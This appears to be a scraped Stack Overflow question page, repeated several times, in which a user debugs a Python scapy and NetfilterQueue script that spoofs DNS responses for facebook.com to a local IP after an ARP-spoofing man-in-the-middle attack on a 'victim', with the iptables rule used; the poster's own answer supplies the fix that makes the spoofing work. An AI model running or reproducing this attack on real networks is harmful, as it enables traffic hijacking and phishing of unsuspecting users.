Python dns spoofing dont work nome not resolved












2














i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.



My script



from scapy.all import *
from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1

def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )

if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()

# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))

print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)

# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')

nfqueue.unbind()


I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.



Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.










share|improve this question






















  • Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
    – Cukic0d
    Nov 11 at 14:19
















2














i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.



My script



from scapy.all import *
from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1

def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )

if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()

# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))

print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)

# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')

nfqueue.unbind()


I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.



Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.










share|improve this question






















  • Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
    – Cukic0d
    Nov 11 at 14:19














2












2








2







i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.



My script



from scapy.all import *
from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1

def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )

if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()

# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))

print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)

# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')

nfqueue.unbind()


I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.



Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.










share|improve this question













i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.



My script



from scapy.all import *
from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1

def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )

if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()

# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))

print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)

# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')

nfqueue.unbind()


I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.



Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.







python dns scapy arp






share|improve this question













share|improve this question











share|improve this question




share|improve this question










asked Nov 11 at 4:54









Joako Itria

112




112












  • Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
    – Cukic0d
    Nov 11 at 14:19


















  • Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
    – Cukic0d
    Nov 11 at 14:19
















Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19




Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19












1 Answer
1






active

oldest

votes


















0














I solved the problem, I was looking for queries I don't see that sorry



if not originalPayload.haslayer(DNSQR)


DNSQR is dns query, and I want to take dns answers, so the code is that:



if not originalPayload.haslayer(DNSRR)





share|improve this answer























    Your Answer






    StackExchange.ifUsing("editor", function () {
    StackExchange.using("externalEditor", function () {
    StackExchange.using("snippets", function () {
    StackExchange.snippets.init();
    });
    });
    }, "code-snippets");

    StackExchange.ready(function() {
    var channelOptions = {
    tags: "".split(" "),
    id: "1"
    };
    initTagRenderer("".split(" "), "".split(" "), channelOptions);

    StackExchange.using("externalEditor", function() {
    // Have to fire editor after snippets, if snippets enabled
    if (StackExchange.settings.snippets.snippetsEnabled) {
    StackExchange.using("snippets", function() {
    createEditor();
    });
    }
    else {
    createEditor();
    }
    });

    function createEditor() {
    StackExchange.prepareEditor({
    heartbeatType: 'answer',
    autoActivateHeartbeat: false,
    convertImagesToLinks: true,
    noModals: true,
    showLowRepImageUploadWarning: true,
    reputationToPostImages: 10,
    bindNavPrevention: true,
    postfix: "",
    imageUploader: {
    brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
    contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
    allowUrls: true
    },
    onDemand: true,
    discardSelector: ".discard-answer"
    ,immediatelyShowMarkdownHelp:true
    });


    }
    });














    draft saved

    draft discarded


















    StackExchange.ready(
    function () {
    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53245958%2fpython-dns-spoofing-dont-work-nome-not-resolved%23new-answer', 'question_page');
    }
    );

    Post as a guest















    Required, but never shown

























    1 Answer
    1






    active

    oldest

    votes








    1 Answer
    1






    active

    oldest

    votes









    active

    oldest

    votes






    active

    oldest

    votes









    0














    I solved the problem, I was looking for queries I don't see that sorry



    if not originalPayload.haslayer(DNSQR)


    DNSQR is dns query, and I want to take dns answers, so the code is that:



    if not originalPayload.haslayer(DNSRR)





    share|improve this answer




























      0














      I solved the problem, I was looking for queries I don't see that sorry



      if not originalPayload.haslayer(DNSQR)


      DNSQR is dns query, and I want to take dns answers, so the code is that:



      if not originalPayload.haslayer(DNSRR)





      share|improve this answer


























        0












        0








        0






        I solved the problem, I was looking for queries I don't see that sorry



        if not originalPayload.haslayer(DNSQR)


        DNSQR is dns query, and I want to take dns answers, so the code is that:



        if not originalPayload.haslayer(DNSRR)





        share|improve this answer














        I solved the problem, I was looking for queries I don't see that sorry



        if not originalPayload.haslayer(DNSQR)


        DNSQR is dns query, and I want to take dns answers, so the code is that:



        if not originalPayload.haslayer(DNSRR)






        share|improve this answer














        share|improve this answer



        share|improve this answer








        edited Nov 16 at 5:56









        marc_s

        570k12811021250




        570k12811021250










        answered Nov 16 at 3:06









        Joako Itria

        112




        112






























            draft saved

            draft discarded




















































            Thanks for contributing an answer to Stack Overflow!


            • Please be sure to answer the question. Provide details and share your research!

            But avoid



            • Asking for help, clarification, or responding to other answers.

            • Making statements based on opinion; back them up with references or personal experience.


            To learn more, see our tips on writing great answers.





            Some of your past answers have not been well-received, and you're in danger of being blocked from answering.


            Please pay close attention to the following guidance:


            • Please be sure to answer the question. Provide details and share your research!

            But avoid



            • Asking for help, clarification, or responding to other answers.

            • Making statements based on opinion; back them up with references or personal experience.


            To learn more, see our tips on writing great answers.




            draft saved


            draft discarded














            StackExchange.ready(
            function () {
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53245958%2fpython-dns-spoofing-dont-work-nome-not-resolved%23new-answer', 'question_page');
            }
            );

            Post as a guest















            Required, but never shown





















































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown

































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown







            Popular posts from this blog

            Biblatex bibliography style without URLs when DOI exists (in Overleaf with Zotero bibliography)

            ComboBox Display Member on multiple fields

            Is it possible to collect Nectar points via Trainline?